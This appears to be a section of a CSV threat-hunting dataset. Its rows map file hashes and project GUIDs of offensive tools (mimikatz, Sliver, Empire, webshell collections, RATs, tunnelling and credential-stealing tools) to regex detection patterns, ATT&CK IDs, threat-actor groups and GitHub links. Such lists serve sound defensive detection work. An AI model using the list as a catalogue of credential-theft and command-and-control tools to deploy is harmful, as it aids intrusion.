"*2e0680b916b117d6eff7e621212b7ac6f28c41b95a3fc18b91b13922e3e2e72f*",".{0,1000}2e0680b916b117d6eff7e621212b7ac6f28c41b95a3fc18b91b13922e3e2e72f.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","23979"
"*2e09c605521fc3d2a8cdda835b54a6054a577071f5ea3f26add10cbfe0dcb369*",".{0,1000}2e09c605521fc3d2a8cdda835b54a6054a577071f5ea3f26add10cbfe0dcb369.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23980"
"*2e10414ca66fb0469f425572ceb27299306a76d1ed0a1f39050314c1ece46f66*",".{0,1000}2e10414ca66fb0469f425572ceb27299306a76d1ed0a1f39050314c1ece46f66.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23981"
"*2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3*",".{0,1000}2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23982"
"*2e10ff03c18dcdeda7ccb185154f17ae29f54920a489edd270c535d7813366e0*",".{0,1000}2e10ff03c18dcdeda7ccb185154f17ae29f54920a489edd270c535d7813366e0.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","23983"
"*2e179a37f42864951b1151bba266fff17c45e6cacf0fbc8ebf8d8ad9ab45ada9*",".{0,1000}2e179a37f42864951b1151bba266fff17c45e6cacf0fbc8ebf8d8ad9ab45ada9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23984"
"*2e18f54ffc6007a57706d500ea0159baed76eeec31c1a0a2ee2e5ce24b79acc6*",".{0,1000}2e18f54ffc6007a57706d500ea0159baed76eeec31c1a0a2ee2e5ce24b79acc6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23985"
"*2e21672308bcb51cab1a41253f0132ad82101d5b24c33dd1fdad89b4bd619dd7*",".{0,1000}2e21672308bcb51cab1a41253f0132ad82101d5b24c33dd1fdad89b4bd619dd7.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23987"
"*2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97*",".{0,1000}2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23989"
"*2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6*",".{0,1000}2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","23990"
"*2e3bc20ce205875bea72dc1aceafc75307c0ed033d7e11846d97ca30ab3852ee*",".{0,1000}2e3bc20ce205875bea72dc1aceafc75307c0ed033d7e11846d97ca30ab3852ee.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23991"
"*2e427f766b9421cc1873cdc07c3552d3ab457c9139db05b2440b23577ab97217*",".{0,1000}2e427f766b9421cc1873cdc07c3552d3ab457c9139db05b2440b23577ab97217.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23993"
"*2e47db0e24601fb84751b429e0bc672a644961168901759e6e96a97896bb6f99*",".{0,1000}2e47db0e24601fb84751b429e0bc672a644961168901759e6e96a97896bb6f99.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23995"
"*2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525*",".{0,1000}2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23997"
"*2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c*",".{0,1000}2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23998"
"*2e635883f111c05144ef8473d7a7a35a9ce1b5d50e0f944957cb39a39c860bde*",".{0,1000}2e635883f111c05144ef8473d7a7a35a9ce1b5d50e0f944957cb39a39c860bde.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24000"
"*2e67c9adb1962e9b5c9a025b2901fc01e2a214b53f5552656a07f2057307f6e5*",".{0,1000}2e67c9adb1962e9b5c9a025b2901fc01e2a214b53f5552656a07f2057307f6e5.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","24001"
"*2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630*",".{0,1000}2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24002"
"*2e70433f8b5f60e28dbd95757dd4bf967fa744142deac4b3bcb0d3b11cb99753*",".{0,1000}2e70433f8b5f60e28dbd95757dd4bf967fa744142deac4b3bcb0d3b11cb99753.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24003"
"*2e70b4bcc21c4aba64c283af815b20d52c79c93f14f9df623a6e588491155acf*",".{0,1000}2e70b4bcc21c4aba64c283af815b20d52c79c93f14f9df623a6e588491155acf.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","24004"
"*2e7451bba0392fb9d687c8cf6d7b99a7983742542ac0217d11f899d2d7bad07b*",".{0,1000}2e7451bba0392fb9d687c8cf6d7b99a7983742542ac0217d11f899d2d7bad07b.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","#filehash","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","24005"
"*2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e*",".{0,1000}2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24007"
"*2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e*",".{0,1000}2e75b82c2b0c1f1c1d449fb6077cad9bb5311ed933f990214efdb6556b27017e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24008"
"*2e777ea84aa3cca0a17f3a08776d0bb993ad0ca42b2276429f13e7e036d51746*",".{0,1000}2e777ea84aa3cca0a17f3a08776d0bb993ad0ca42b2276429f13e7e036d51746.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#filehash","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","24010"
"*2e7780d7593f341c0b72ad38f91638cfbb917e7f9f342b3ffaa842d207d4ab85*",".{0,1000}2e7780d7593f341c0b72ad38f91638cfbb917e7f9f342b3ffaa842d207d4ab85.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24011"
"*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*",".{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","24013"
"*2e7ba2362283c11797edad1044e20352c880eb21f946e0527a222d342dcbce78*",".{0,1000}2e7ba2362283c11797edad1044e20352c880eb21f946e0527a222d342dcbce78.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24014"
"*2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f*",".{0,1000}2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24015"
"*2e7c7e2e3546caafc5ca9729bfc5ae561049e75f24ce1439198caba776996d66*",".{0,1000}2e7c7e2e3546caafc5ca9729bfc5ae561049e75f24ce1439198caba776996d66.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24016"
"*2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849*",".{0,1000}2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24017"
"*2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076*",".{0,1000}2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24018"
"*2e84c88282d85d3b93ae2637b90e3f4388fc2f96092b7e7aaa8e66b288549930*",".{0,1000}2e84c88282d85d3b93ae2637b90e3f4388fc2f96092b7e7aaa8e66b288549930.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24019"
"*2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d*",".{0,1000}2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24021"
"*2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d*",".{0,1000}2e8ab836111066fba6cfbf4572786b071bbaea1139c2eab5a7155b635e48318d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24022"
"*2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298*",".{0,1000}2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","24025"
"*2e93e83a8c1671dec1b0b4a9873025f47567a1092e12bcfe14d1f78e5696aaeb*",".{0,1000}2e93e83a8c1671dec1b0b4a9873025f47567a1092e12bcfe14d1f78e5696aaeb.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24028"
"*2e9447cafdf0506400c263e4656c0a995618be12be9ebbf08cfbc5ea143d328a*",".{0,1000}2e9447cafdf0506400c263e4656c0a995618be12be9ebbf08cfbc5ea143d328a.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24029"
"*2e944f0ec797e703db9def360969ee414dd733cac1ee7a3eac98d4131529668c*",".{0,1000}2e944f0ec797e703db9def360969ee414dd733cac1ee7a3eac98d4131529668c.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","24030"
"*2E98B8D4-7A26-4F04-A95D-2051B0AB884C*",".{0,1000}2E98B8D4\-7A26\-4F04\-A95D\-2051B0AB884C.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#GUIDproject","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","24032"
"*2E9B1462-F47C-48CA-9D85-004493892381*",".{0,1000}2E9B1462\-F47C\-48CA\-9D85\-004493892381.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#GUIDproject","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","24033"
